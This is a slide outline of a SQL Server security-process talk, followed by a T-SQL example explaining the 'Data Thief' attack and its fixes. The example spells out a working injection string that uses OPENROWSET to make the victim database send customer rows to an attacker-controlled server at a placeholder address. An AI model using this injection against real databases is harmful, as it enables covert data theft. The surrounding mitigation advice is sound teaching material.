Security Process & You: SQL Server Case Study
James Hamilton, General Manager, SQL Server Webdata Development & Security Architect

CERT/CC incident statistics, 1988 through 2003
- Incident: a single security issue, grouping together all impacts of that issue.
- Issue: disruption, DoS, loss of data, misuse, damage, loss of confidentiality.
- Source:

Know Your Enemy
- Black hat community sharing.
- Cracker tools: port scanners, network sniffers, brute-force password crackers, dictionary-based password crackers, de-compilers, debuggers.

Data Thief Demonstration
Presented by Girish Chander, SQL Server Security PM. Author of Data Thief: Cesar Cerrudo.
- Setup: a vulnerable web application in front of its local database, with the attacker's own database listening remotely.
- A SQL-injected OPENROWSET statement causes the victim's database to open an outbound connection to the attacker's database and push useful data back to it.

Data Thief Architecture
- Attack string: form values appended with an extra SQL statement.
- SQL-injected query: the application's query now contains an OPENROWSET statement.
- Data flow: application, then the local (victim) database, then the attacker's database, which receives the stolen rows.

Security Push
- Goal: the full 800-person team productive from the start.
- Phases: Preparation Phase, Security Push, Push Follow-on (5/1/2003).
- Threat-driven reviews & testing.
- Learn from other teams' experiences.
- Don't start the security push until the team is prepared.

Preparation Phase
- Motivation, goals, approach, process, fix bar, ...
- Web site set up for general announcements & communication.
- Security training for every team member:
  - Mandatory training for Architects, PMs, Developers & Testers.
  - Topics: threat modeling, hacker/cracker tools, the black hat community, security development & test tools, attack vectors & defense.
  - Video-taped training for new team members.
  - On-demand webcasts (search on "security") with more detail on important security-related topics.
- Separate bug-tracking DB for tracking file reviews.
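The Data Thief slides describe the attack only at the box-and-arrow level. The T-SQL below is an added example, not code from the deck or from Cerrudo's tool, reconstructing the three pieces the slides name: the vulnerable concatenated query, the injected OPENROWSET statement that makes the victim server connect out to the attacker, and the two fixes a SQL Server team would apply. Table name dbo.Customers, the login in the attack string, and the attacker address 203.0.113.10 (an RFC 5737 documentation address) are all assumptions for the example.

```sql
-- Added example (assumed names: dbo.Customers, attacker listener at 203.0.113.10).

-- 1. Vulnerable pattern: dynamic SQL built by concatenating a form value.
DECLARE @user nvarchar(100) = N'bob';   -- value taken straight from the HTML form
DECLARE @sql  nvarchar(max) =
    N'SELECT * FROM dbo.Customers WHERE Name = ''' + @user + N'''';
EXEC (@sql);

-- 2. The Data Thief style attack string submitted in the same form field.
--    The first quote closes the literal, the semicolon starts a second
--    statement, and the trailing comment swallows the rest of the original.
--    The OPENROWSET target is the attacker's own SQL Server: the victim
--    server connects OUT to it on TCP 1433 and inserts the stolen rows there.
DECLARE @attack nvarchar(max) =
    N'x''; INSERT INTO OPENROWSET(''SQLOLEDB'', '
  + N'''Server=203.0.113.10,1433;uid=sa;pwd=thief;'', '
  + N'''SELECT * FROM loot.dbo.Customers'') '
  + N'SELECT * FROM dbo.Customers; --';

-- 3. What step 1 actually executes once @attack replaces @user:
--
--   SELECT * FROM dbo.Customers WHERE Name = 'x';
--   INSERT INTO OPENROWSET('SQLOLEDB',
--          'Server=203.0.113.10,1433;uid=sa;pwd=thief;',
--          'SELECT * FROM loot.dbo.Customers')
--   SELECT * FROM dbo.Customers; --'
--
-- Nothing is returned to the web page, so the exfiltration is invisible to
-- the user and the application; the attacker reads loot.dbo.Customers later.

-- 4. Fix (a): parameterize. The form value is bound as data and can no
--    longer become SQL syntax, so the quote/semicolon trick does nothing.
EXEC sp_executesql
     N'SELECT * FROM dbo.Customers WHERE Name = @name',
     N'@name nvarchar(100)',
     @name = @user;

-- 5. Fix (b): close the outbound channel. Ad hoc OPENROWSET/OPENDATASOURCE
--    against remote servers is controlled by this option on SQL Server 2005
--    and later (it is off by default); keep it off and alert if it changes.
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;  RECONFIGURE;

-- 6. Least privilege: run the application under a login that is not
--    sysadmin, so a successful injection cannot reach server-level features.
```

Egress filtering from the database tier finishes the job: even with ad hoc queries enabled, a server that cannot open outbound TCP 1433 to arbitrary hosts cannot be used as a Data Thief client.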